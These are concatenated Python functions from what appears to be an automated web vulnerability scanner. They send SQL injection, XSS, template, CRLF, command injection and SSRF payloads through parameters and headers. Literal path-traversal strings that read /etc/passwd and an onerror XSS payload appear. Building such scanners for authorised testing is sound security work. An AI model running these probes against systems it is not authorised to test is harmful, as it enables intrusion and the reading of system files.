def Put(url): if methods.Put(url) == 1: for param in url.split('?')[1].split('&'): for payload, message in ssti_payloads.items(): if post_data(urlparse(url).query) == 0: break r = nq.Put( url.split('?')[0], post_data(urlparse(url).query)) if r == 0: break r = len(findall(message.encode('utf-8'), r.content)) data = urlparse(url.replace(param, param + payload)).query req = nq.Put(url.split('?')[0], post_data(data)) if req == 0: break if r < len(findall(message.encode('utf-8'), req.content)): bug = { 'name': 'template injection', 'payload': payload, 'method': 'PUT', 'parameter': param, 'target': url.split('?')[0], 'data': data } show.bug(bug='template injection', payload=payload, method='PUT', parameter=param, target=url.split('?')[0], link=data) return bug return None
def Get(url): if methods.Get(url) == 1: if 1 == 1: for param in url.split('?')[1].split('&'): for payload, message in ssti_payloads.items(): r = nq.Get(url) if r == 0: break r = len(findall(message.encode('utf-8'), r.content)) req = nq.Get(url.replace(param, param + en(payload))) if req == 0: break if r < len( findall(message.encode('utf-8'), req.content)): bug = { 'name': 'template injection', 'payload': payload, 'method': 'GET', 'parameter': param, 'link': url.replace(param, param + en(payload)), 'target': url.split('?')[0] } show.bug(bug='template injection', payload=payload, method='GET', parameter=param, link=url.replace(param, param + en(payload))) return bug return None
def Post(url): for param in url.split('?')[1].split('&'): for payload in sqli_payloads: d = post_data(urlparse(url).query) if d == 0: break r = nq.Post(url, post_data(urlparse(url).query)) if r == 0: break save_request.save(r) data = urlparse(url.replace(param, param + payload)).query req = nq.Post(url.split('?')[0], post_data(data)) if req == 0: break for n, e in sql_err.items(): r = findall(e.encode('utf-8'), save_request.get().content) r2 = findall(e.encode('utf-8'), req.content) if len(r) < len(r2): show.bug(bug='SQL injection', payload=payload, method='POST', parameter=param, target=url.split('?')[0], link=data) break
def Get(url): all_headers = {} d = nq.Dump() for header in SCAN_Headers: for payload in xss_payloads: try: H = nq.Dump()['headers'][header] P = f'{H}{payload}' except: P = payload for H, V in d['headers'].items(): if H == header: pass else: all_headers[H] = V all_headers[header] = P req = REQ(url, headers=all_headers) if req != 0: if payload.encode('utf-8') in req.content: show.bug_Header(bug='Cross-site scripting', payload=payload, method='GET', header=header, target=url) break
def Get(url): d = nq.Dump() for header in SCAN_Headers: for payload in sqli_payloads: all_headers = {} r = nq.Get(url) if r == 0: break save_request.save(r) try: H = nq.Dump()['headers'][header] P = f'{H}{payload}' except: P = payload for H, V in d['headers'].items(): if H == header: pass else: all_headers[H] = V all_headers[header] = P req = REQ(url.split('?')[0], method='GET', headers=all_headers) if req == 0: break for n, e in sql_err.items(): r2 = findall(e.encode('utf-8'), save_request.get().content) r3 = findall(e.encode('utf-8'), req.content) if len(r2) < len(r3): show.bug_Header(bug='SQL injection', payload=payload, method='GET', header=header, target=url) break
def Get(url): d = nq.Dump() for header in SCAN_Headers: for payload, message in ssti_payloads.items(): all_headers = {} r = nq.Get(url) if r == 0: break r = len(findall(message.encode('utf-8'), r.content)) try: H = nq.Dump()['headers'][header] P = f'{H}{payload}' except: P = payload for H, V in d['headers'].items(): if H == header: pass else: all_headers[H] = V all_headers[header] = P req = REQ(url.split('?')[0], headers=all_headers) if req == 0: break if r < len(findall(message.encode('utf-8'), req.content)): show.bug_Header(bug='template injection', payload=payload, method='GET', header=header, target=url) break
def Put(url): for param in url.split('?')[1].split('&'): for payload in sqli_payloads: if post_data(urlparse(url).query) == 0: break r = nq.Put(url, post_data(urlparse(url).query)) if r == 0: break save_request.save(r) data = urlparse(url.replace(param, param + payload)).query req = nq.Put(url.split('?')[0], post_data(data)) if req == 0: break for n, e in sql_err.items(): r = findall(e.encode('utf-8'), save_request.get().content) r2 = findall(e.encode('utf-8'), req.content) if len(r) < len(r2): bug = { 'name': 'SQL injection', 'payload': payload, 'method': 'PUT', 'parameter': param, 'target': url.split('?')[0], 'data': data } show.bug(bug='SQL injection', payload=payload, method='PUT', parameter=param, target=url.split('?')[0], link=data) return bug return None
def Get(url): for param in url.split('?')[1].split('&'): for payload in sqli_payloads: r = nq.Get(url) if r == 0: break save_request.save(r) req = nq.Get(url.replace(param, param + payload)) if req == 0: break for n, e in sql_err.items(): r2 = findall(e.encode('utf-8'), save_request.get().content) r3 = findall(e.encode('utf-8'), req.content) if len(r2) < len(r3): bug = { 'name': 'SQL injection', 'payload': payload, 'method': 'GET', 'parameter': param, 'link': url.replace(param, param + en(payload)), 'target': url.split('?')[0] } show.bug(bug='SQL injection', payload=payload, method='GET', parameter=param, target=url.split('?')[0], link=url.replace(param, param + en(payload))) return bug return None
def run(options): for url in options['url']: cookie['usid'] = '../../../../../../../../../../../../../etc/passwd' nq.Update(cookie=cookie) r = nq.Get(url) if r != 0: if '/usr/sbin/nologin' in r.content.decode(): print("[+] Read /etc/passwd :)") print('hi')
def GO(url,host): d = "?r="+urlencoder(f'{host}/r') # print(d) l = len(ssrf_parameters) for par in ssrf_parameters: pay = urlencoder(f'{host}/{par}') d += f'&{par}={pay}' # print(d) if len(d) > l*3: nq.Get(d) nq.Post(url.split('?')[0],urlparse(d).query) d = f"{url.split('?')[0]}?r={host}/r"
def Get(url): mt = methods.Get(url) if mt == 0: pass elif mt == 1 and refxss.Get(url) == 1: for param in url.split("?")[1].split("&"): for payload in xss_payloads: req = nq.Get(url.replace(param, param + en(payload))) if req != 0: if payload.encode('utf-8') in req.content: bug = { 'name': 'Corss-site scripting', 'payload': payload, 'method': 'GET', 'parameter': param, 'link': url.replace(param, param + en(payload)) } show.bug(bug='Cross-site scripting', payload=payload, method='GET', parameter=param, link=url.replace(param, param + en(payload))) return bug return None
def Put(url): mt = methods.Put(url.split('?')[0], urlparse(url).query) if mt == 0: pass elif mt == 1 and refxss.Put(url) == 1: for param in url.split('?')[1].split('&'): for payload in xss_payloads: data = urlparse(url.replace(param, param + payload)).query d = post_data(data) if d == 0: break req = nq.Put(url.split('?')[0], post_data(data)) if req == 0: break if payload.encode('utf-8') in req.content: bug = { 'name': 'Corss-site scripting', 'payload': payload, 'method': 'PUT', 'parameter': param, 'target': url.split('?')[0], 'data': data } show.bug(bug='Cross-site scripting', payload=payload, method='PUT', parameter=param, target=url.split('?')[0], link=data) return bug return None
def Get(url): for param in url.split('?')[1].split('&'): for payload in crlf_payloads: r = nq.Get(url.replace(param,param + en(payload))) if r == 0: break if r.headers.get('Header-Test'): bug = { 'name':'CRLF injection', 'payload':payload.replace('\n','%0a').replace('\r','%0d'), 'method':'GET', 'parameter':param, 'link':url.replace(param,param + en(payload)), 'target':url.split('?')[0] } show.bug( bug='CRLF injection', payload=payload.replace('\n','%0a').replace('\r','%0d'), method='GET', parameter=param, link=url.replace(param,param + en(payload)) ) return bug else: continue return None
def scan(host): try: payloads = { '../../../../../../../../../../etc/passwd{{':'root:' } for payload,msg in payloads.items(): nq.Update(header={'Accept':payload}) r = nq.Get(host) if r != 0: try: if msg.encode() in r.content: print(f'[+] Found :> {host}') finally: pass finally: pass
def Put(url,data=None): try: if nq.Put(url.split('?')[0],post_data(urlparse(url).query)).status_code != 405: return 1 else: return 0 except: return 0
def Get(url): for param in url.split('?')[1].split('&'): for payload, message in ssti_payloads.items(): r = nq.Get(url) if r == 0: break r = len(findall(message.encode('utf-8'), r.content)) req = nq.Get(url.replace(param, param + en(payload))) if req == 0: break if r < len(findall(message.encode('utf-8'), req.content)): show.bug(bug='template injection', payload=payload, method='GET', parameter=param, link=url.replace(param, param + en(payload))) break
def Get(url): try: if nq.Get(url).status_code != 405: return 1 else: return 0 except: return 0
def Back_H(opt): return nq.Update(redirect=opt['redirect'], dump=opt['dump'], cookie=opt['cookies'], header=opt['headers'], timeout=opt['timeout'], proxies=opt['proxy'], random_agents=opt['random_agents'])
def Put(url): d = nq.Dump() for header in SCAN_Headers: for payload in sqli_payloads: all_headers = {} try: url.split('?')[1].split('&') data = urlparse(url).query data = post_data(data) if data == 0: data = {} except: data = {} r = nq.Put(url, data) if r == 0: break save_request.save(r) try: H = nq.Dump()['headers'][header] P = f'{H}{payload}' except: P = payload for H, V in d['headers'].items(): if H == header: pass else: all_headers[H] = V all_headers[header] = P req = REQ(url.split('?')[0], data=data, method='PUT', headers=all_headers) if req == 0: break for n, e in sql_err.items(): r = findall(e.encode('utf-8'), save_request.get().content) r2 = findall(e.encode('utf-8'), req.content) if len(r) < len(r2): show.bug_Header(bug='SQL injection', payload=payload, method='PUT', header=header, target=url) break
def httper(url): try: url = parser(url) proto_url = [f'http://{url}', f'https://{url}'] for url in proto_url: r = nq.Get(url) if r != 0: print(r.url) except Exception as e: print(e)
def Put(url): d = nq.Dump() for header in SCAN_Headers: for payload, message in rce_payloads.items(): all_headers = {} payload = payload.replace('\n', '%0a') try: url.split('?')[1].split('&') data = urlparse(url).query data = post_data(data) if data == 0: data = {} except: data = {} r = nq.Put(url.split('?')[0], data) if r == 0: break r = len(findall(message.encode('utf-8'), r.content)) try: H = nq.Dump()['headers'][header] P = f'{H}{payload}' except: P = payload for H, V in d['headers'].items(): if H == header: pass else: all_headers[H] = V all_headers[header] = P req = REQ(url.split('?')[0], data=data, method='PUT', headers=all_headers) if req == 0: break if r < len(findall(message.encode('utf-8'), req.content)): show.bug_Header(bug='command injection', payload=payload.replace('\n', '%0a'), method='PUT', header=header, target=url) break
def Put(url): try: for param in url.split('?')[1].split('&'): url = url.replace(param, f'{param}scantrrr') r = nq.Put(url.split('?')[0],post_data(url)) if r.content.decode().lower().find('scantrrr') != -1: return 1 else: return 0 except: return 0
def GO(url, host): l = len(ssrf_parameters) newurl = url for par in ssrf_parameters: pay = f'{host}/{par}' if newurl != url: if len(urlparse(newurl).query) > 0: newurl += f'&{par}={pay}' else: newurl += f'?{par}={pay}' else: if len(urlparse(url).query) > 0: newurl += f'&{par}={pay}' else: newurl += f'?{par}={pay}' if len(urlparse(newurl).query.split( '=')) == parameters_in_one_request + 1: nq.Get(newurl) nq.Post(url.split('?')[0], post_data(urlparse(newurl).query)) newurl = url
def REQ(url=None, data=None, method='GET', headers=None): d = nq.Dump() return new_req(url=url, proxy=d['proxy'], Dump=d['dump'], method=method, headers=headers, timeout=d['timeout'], redirect=d['redirect'], cookies=d['cookies'], data=data)
def NEON_CVE(url): urls = add_path(url) for u in urls: r = nq.Post(u, post_data('q=<img src=x onerror=alert(1)>')) if '<img src=x onerror=alert(1)>'.encode('utf-8') in r.content: show.bug(bug='Cross-site scripting', payload='<img src=x onerror=alert(1)>', method='GET', parameter='q', target=u, link='q=<img src=x onerror=alert(1)>')
def scan(host): try: payloads = {'scant3r.org': 'scant3r.org'} for payload, msg in payloads.items(): nq.Update(header={'Host': 'scant3r.org'}) r = nq.Get(host) if r != 0: try: loc = r.headers.get('Location') if loc: r = urlparse(loc).netloc if 'scant3r.org' in r: print(f'''[+] Found :> {host}''') break else: continue finally: pass finally: pass
def inject(host): for param in host.split('?')[1].split('&'): done = 0 for payload in payloads: r = nq.Get(host.replace(param,param + payload)) if r != 0: for header,value in r.headers.items(): if header == 'Header-Test': if value == 'BLATRUC': print(f'[{green}CRLF{rest}] Found :> {host.replace(param,param + payload)}') done = 1 if done == 1: break for param in host.split('?')[1].split('&'): done = 0 for payload in payloads: data = urlparse(host.replace(param,param + payload)).query d = post_data(data) r = nq.Post(host.split('?')[0],d) if r != 0: for header,value in r.headers.items(): if header == 'Header-Test': if value == 'BLATRUC': print(f'[{green}CRLF{rest}] Found :> {host}\n{info} Method :> POST\n{info} Data :> {data}') done = 1 if done == 1: break for param in host.split('?')[1].split('&'): done = 0 for payload in payloads: data = urlparse(host.replace(param,param + payload)).query d = post_data(data) r = nq.Put(host.split('?')[0],d) if r != 0: for header,value in r.headers.items(): if header == 'Header-Test': if value == 'BLATRUC': print(f'[{green}CRLF{rest}] Found :> {host}\n{info} Method :> PUT\n{info} Data :> {data}') done = 1 if done == 1: break
def Post(url): try: for param in url.split('?')[1].split('&'): url = url.replace(param, f'{param}scantrrr') r = nq.Post(url.split('?')[0],post_data(url)) for header,value in r.headers.items(): if 'scantrrr' in header or 'scantrrr' in value: return 1 else: return 0 except: return 0
def Post(url): for param in url.split('?')[1].split('&'): for payload, message in ssti_payloads.items(): if post_data(urlparse(url).query) == 0: break r = nq.Post(url.split('?')[0], post_data(urlparse(url).query)) if r == 0: break r = len(findall(message.encode('utf-8'), r.content)) data = urlparse(url.replace(param, param + payload)).query req = nq.Post(url.split('?')[0], post_data(data)) if req == 0: break if r < len(findall(message.encode('utf-8'), req.content)): show.bug(bug='template injection', payload=payload, method='POST', parameter=param, target=url.split('?')[0], link=data) break
def Get(url): for param in url.split("?")[1].split("&"): for payload in xss_payloads: req = nq.Get(url.replace(param, param + en(payload))) if req != 0: if payload.encode('utf-8') in req.content: show.bug(bug='Cross-site scripting', payload=payload, method='GET', parameter=param, link=url.replace(param, param + en(payload))) break